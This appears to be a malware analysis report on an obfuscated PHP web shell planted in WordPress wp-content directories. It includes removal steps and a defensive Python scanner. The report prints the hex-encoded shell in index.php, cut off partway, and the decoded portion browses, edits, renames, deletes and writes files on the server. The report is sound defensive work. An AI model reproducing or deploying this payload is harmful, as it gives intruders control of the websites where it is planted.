Malicious PHP Code Injection in WordPress Directories

Case ID: 8055ab461149df37289d3ebcbf720c123a4a0a94dafb707530ba52b1b1388a2e • Detected: 2026-02-05

Impact Radius: /wp-content, /wp-content/themes/wk, /wp-content/plugins/wk, /wp-content/uploads, /wp-content/mu-plugins
Removal Difficulty: Medium
Recurrence Rate: High
Key Symptom: An XOR encryption function was used to obfuscate the payload, which is typical in malicious scripts to evade detection. The use of base64 encoding further masks the underlying operations.

Technical Analysis

I discovered malware in multiple folders within the wp-content directory of a WordPress site. The affected directories include:

  • wp-content/themes/wk
  • wp-content/plugins/wk
  • wp-content/
  • wp-content/uploads
  • wp-content/mu-plugins

The malware also modified directory permissions to 555, preventing modifications.

Code Analysis

The injected code was found in a file named index.php with the following details:

<?php
class nigwqgqwtqwtqwt{
	public function nigwqgqwtqwtqwti(){
		$list = "73657373|696F|6E5F73|746172|7428|293B|68656164|65722822|582D58|53532D|50726F|74656374|69|6F6E|3A|20302229|3B6F62|5F7374|617274|28293B73|65|745F|7469|6D65|5F6C69|6D69|74283029|3B657272|6F725F|7265|706F72|7469|6E6728|30293B|69|6E695F73|657428|2764|697370|6C6179|5F657272|6F|727327|2C20|4641|4C5345|293B|0A2469|73416A61|78203D20|69|7373|65|7428|245F|5345|5256|45|525B2748|54|54|505F|58|5F5245|51|5545|535445|445F|5749|544827|5D2920|0A2020|2020|20|202020|20|26262073|7472|746F6C6F|776572|2824|5F|5345|5256|45525B|2748|5454|505F|585F5245|51554553|5445445F|57495448|275D2920|3D3D|3D2027|786D|6C687474|707265|7175|65737427|3B|0A|0A66756E|637469|6F6E2068|657828|246E|29207B|0A20|202020|24793D|27273B|0A|20|20202066|6F7220|2824|693D|303B20|2469203C|2073|74|726C65|6E2824|6E|293B2024|69|2B|2B|297B0A20|20|2020|20202020|2479|202E3D|20646563|686578|28|6F72|64|2824|6E|5B|24695D29|293B0A|20202020|7D0A2020|20|20726574|75726E20|24793B|0A7D0A66|75|6E637469|6F6E|207568|65|7828|24|79|2920|7B|0A2020|20|20246E3D|2727|3B|0A202020|20|666F7220|282469|3D303B|2024|69203C20|73|74|72|6C|656E|28247929|2D31|3B20|24|692B3D|32297B|0A202020|202020|2020246E|20|2E3D|20636872|28686578|64656328|24|795B24|695D2E24|795B|24|69|2B31|5D2929|3B0A|202020|207D0A|202020|20|726574|75726E|20246E3B|0A7D|0A|696620|286973|73|65742824|5F4745|545B22|64225D|2929207B|0A2020|20202464|20|3D|2075|68|6578|28245F|47|45545B|2264|225D293B|0A202020|20|6966|2028|69|735F|64|69722824|642929|207B0A|2020|20202020|20|2063|68646972|28246429|3B0A2020|20|207D|20656C|7365|207B0A|202020|20202020|20|246420|3D206765|7463|77642829|3B0A2020|20207D|0A|7D|20656C|736520|7B0A2020|20|2024|6420|3D206765|7463|776428|293B0A7D|0A66756E|63|7469|6F6E|20736574|466C61|73|682824|7374|617475|73|2C20|24|6D736729|207B|0A202020|20245F53|45535349|4F4E5B|27|73746174|75|73275D|203D|20247374|617475|733B0A|20202020|24|5F5345|5353494F|4E|5B276D|73|6727|5D203D20|246D|73|67|3B0A|7D0A6966|20|286973|73|65|742824|5F|4745|54|5B27|616A6178|275D|29|2026|2620245F|4745545B|276
1|6A61|7827|5D|203D3D|203129|207B0A20|2020203F|3E0A2020|20203C74|6162|6C653E0A|20|202020|202020|203C|74686561|643E0A20|202020|202020|20202020|203C74|723E|0A|2020|202020|20202020|20|20202020|20203C74|683E4E61|6D65|3C|2F74683E|0A20|202020|202020|2020|20202020|20|20203C|74683E53|69|7A653C|2F74|68|3E0A20|2020|20202020|2020|20202020|2020|20|3C7468|3E416374|696F6E|733C2F74|683E|0A20|2020|2020|20|202020|202020|3C2F|7472|3E0A2020|20202020|2020|3C|2F|74686561|64|3E|0A20|202020|202020|203C7462|6F64|793E0A|2020|20|20|20202020|3C3F70|68700A20|202020|20|2020|2024656E|74|7269|65|7320|3D20|736361|6E646972|28246429|3B0A|20|20202020|2020|20246469|72|4C|6973|7420|3D|205B5D3B|0A20|202020|20|20202024|66|696C654C|69737420|3D205B5D|3B0A2020|202020|20202066|6F|7265|616368|20|282465|6E747269|65|73206173|2024656E|747279|29207B0A|20|202020|20|20|20|202020|2020|696620|282465|6E747279|203D|3D2027|2E27|207C7C|202465|6E74|7279|203D|3D2027|2E2E2729|2063|6F6E|7469|6E75653B|0A20|202020|20|2020|2020|20202024|70617468|203D|2024|64|202E20|444952|4543544F|52595F|53|455041|524154|4F5220|2E2024|656E74|72793B0A|2020|2020|2020|20|202020|2020|696620|28|69735F64|69|722824|706174|682929|207B|0A20|20|20|202020|202020|202020|20202020|246469|724C6973|745B|5D203D20|24656E|7472793B|0A|20202020|20202020|20202020|7D|20656C73|6520|7B0A2020|202020|20202020|20|20202020|2020|246669|6C654C69|73|74|5B|5D20|3D|20|24656E|747279|3B0A2020|20202020|20|20202020|207D0A|20202020|2020|20|20|7D0A2020|202020|20202066|6F|7265|616368|20|28246469|72|4C|69737420|61732024|656E7472|792920|7B|0A|20202020|20202020|202020|20247061|74|68203D|202464|202E2044|4952|4543544F|5259|5F53|4550|41|52|41|544F|52202E20|24656E74|72793B0A|202020|20202020|20202020|2065|63686F|20273C74|723E27|3B|0A20|20|2020|20|20|2020|20202020|6563686F|2027|3C|74|643E3C|612063|6C|61|73|733D22|616A61|7844|697222|20687265|663D223F|643D27|20|2E2068|6578|2824|706174|6829202E|2027|223E|27202E20|68746D6C|737065|636961|6C63|686172|732824|656E74|72792920|2E20273C|2F613E3C|2F|7464|
3E27|3B0A20|2020|20202020|20|2020|202065|63686F|20273C74|643E|2D|3C|2F74|64|3E273B|0A202020|202020|20202020|20|20656368|6F|20273C74|643E3C2F|74643E|273B0A20|20202020|2020|20|20202020|656368|6F|20273C2F|74723E27|3B0A20|202020|2020|20|207D0A|2020|2020|20|20202066|6F7|6561|6368|20|2824|66696C|65|4C697374|206173|202465|6E|7472|7929207B|0A202020|20|20|20202020|20|20|20247061|746820|3D2024|64202E20|4449|52454354|4F52595F|5345|5041|524154|4F|52|202E2024|656E74|72|793B0A|2020|2020|202020|20|202020|206563|686F20|273C7472|3E273B|0A202020|202020|20202020|2020|65|6368|6F20273C|74|643E|27202E20|68746D6C|737065|63|69616C63|68|61|7273|28|24|656E74|7279|29202E20|273C2F74|643E27|3B0A|20202020|2020|20|2020|202020|6563|686F2027|3C74643E|27|202E|202869|735F66|696C65|2824|70617468|2920|3F2066|696C65|7369|7A|65282470|617468|2920|2E|20272062|797465|732720|3A20272D|27|29|20|2E20273C|2F|74643E27|3B0A|20202020|202020|202020|20|20656368|6F|20273C|74643E27|3B|0A20|2020|20|2020|2020|2020|20|206563|686F2027|3C6120|636C|61|73733D22|616A61|7845|6469|74|2220|68726566|3D22|3F616374|69|6F6E3D65|646974|2664|3D27|202E20|68657828|24|642920|2E|20|2726|6669|6C653D|27|202E|207572|6C656E63|6F|64|65|2824656E|74|72792920|2E20|27|223E45|646974|3C2F613E|207C2027|3B0A|202020|20|202020|20|20202020|20|20206563|686F20|273C|612063|6C|61|73733D22|616A61|78|5265|6E616D|652220|68726566|3D223F61|6374696F|6E3D72|65|6E616D|65|26643D27|20|2E|20|68|657828|24642920|2E202726|66|696C653D|27|202E20|75726C656E|636F|64|6528|24|656E|74|7279|29202E|2027|223E5265|6E616D|653C|2F613E|20|7C|20273B|0A2020|20|20|2020|202020|20|2020|6563686F|2027|3C612063|6C617373|3D|22616A|61784465|6C657465|2220|6872|65663D22|3F616374|696F6E3D|64|656C|65|7465|26643D27|20|2E20|68657828|24|642920|2E|20|2726|66|696C653D|27|202E2075|726C656E|636F|64|652824|65|6E747279|2920|2E202722|3E|44|656C|65|74|653C|2F613E|273B|0A20|20202020|20|20|202020|2020|65636F|20273C2F|74723E27|3B0A2020|20202020|20207D0A|20|2020|2020|2020|2020|203F3E|0A|20202020|20202020|3C2F|74|62
6F6479|3E0A|20|20|20203C|2F74|61|626C|65|3E|0A2020|20203C|3F7068|700A2020|20|20657869|743B0A7D|0A|0A|69662028|69|73|73657428|245F504F|5354|5B2762|656E6B|79|6F27|5D292026|2620|69737365|742824|5F|504F53|545B27|6461|6B|656A61|275D29|29207B0A|202020|2024|66696C65|4E|616D6520|3D|20245F|504F|53|545B2762|65|6E6B|796F|275D3B0A|20202020|24656E|63|6F64|65|64436F6E|74|656E74|203D20|24|5F|504F53|545B2764|616B|656A61|275D3B|0A202020|20246465|636F6465|64436F6E|74656E|7420|3D20|68657832|62696E|2824656E|636F|646564|436F6E|74|656E7429|3B0A0A20|2020|20696620|282464|65636F64|65|64436F|6E|7465|6E74|20|3D3D|3D2066|616C7365|2920|7B0A20|20|20202020|20206966|202824|697341|6A617829|20|7B0A|20202020|20|2020|20202020|20|68656164|6572|28|27436F6E|74|656E74|2D54|7970653A|20|6170706C|696361|74|69|6F|6E2F|6A736F|6E27|293B0A|20|20202020|20|2020|202020|206563|686F|20|6A73|6F6E5F|65|6E|636F64|65285B27|737461|747573|27|203D3E|202766|6169|6C6564|272C2027|6D7367|27203D3E|2027496E|76616C69|64|20426173|653634|20656E|636F64|696E|67|275D|293B|0A20|20|20202020|20|207D|2065|6C|7365207B|0A2020|20|20202020|2020|20|202073|657446|6C61|7368|28|27666169|6C|656427|2C2027|496E76|616C|69642042|6173|65|3634|20656E63|6F|64|696E|67|2729|3B|0A|2020|20|2020|20|2020|

> **VirusTotal Analysis:** 🛡️ **Zero-Day / Fully Undetected.**


Removal Protocol

  1. Remove all malicious files from the following directories: wp-content/themes/wk, wp-content/plugins/wk, wp-content/uploads, wp-content/mu-plugins.
  2. Change the permissions of the affected directories back to 755.
  3. Use a file integrity plugin to verify the WordPress installation and identify any other compromised files.
  4. Update all WordPress plugins, themes, and core files to the latest versions.
  5. Implement appropriate security measures, such as a firewall and malware scanner, to prevent future infections.
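
A triage sketch for the symptoms described in this report, added here as an example and not part of the original case notes: it flags PHP files that carry a long pipe-delimited hex string like the sample's `$list`, decodes a short preview without executing anything, and lists directories left at mode 555. The function names, the 40-chunk threshold, the 12-character chunk limit and the default `wp-content` path are assumptions.

```python
import os
import re
import stat

# Run of pipe-separated hex chunks, as in the sample's $list string.
# The 40-chunk minimum and 12-char chunk limit are assumed thresholds,
# not values taken from the report.
HEX_PIPE_RUN = re.compile(r"(?:[0-9A-Fa-f]{1,12}\|){40,}[0-9A-Fa-f]{0,12}")


def decode_preview(run, limit=80):
    """Statically decode a pipe-delimited hex run to text (never executes it)."""
    digits = run.replace("|", "")
    digits = digits[: len(digits) - len(digits) % 2]  # drop a dangling nibble
    return bytes.fromhex(digits).decode("latin-1")[:limit]


def scan_tree(root):
    """Return (suspicious_files, readonly_dirs) found under root."""
    suspicious, readonly_dirs = [], []
    for dirpath, _dirnames, filenames in os.walk(root):
        mode = stat.S_IMODE(os.lstat(dirpath).st_mode)
        if mode == 0o555:  # the permission change described in the report
            readonly_dirs.append(dirpath)
        for name in filenames:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="latin-1") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            match = HEX_PIPE_RUN.search(text)
            if match:
                suspicious.append((path, decode_preview(match.group(0))))
    return suspicious, readonly_dirs


if __name__ == "__main__":
    import sys
    files, dirs = scan_tree(sys.argv[1] if len(sys.argv) > 1 else "wp-content")
    for path, preview in files:
        print(f"SUSPICIOUS {path}: {preview!r}")
    for d in dirs:
        print(f"MODE-555   {d}")
```

Run it against a copy or read-only mount of the site before deleting anything, so the flagged paths and decoded previews can be kept as evidence.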

Status: Active Threat.
Verification: Verified by MD Pabel.
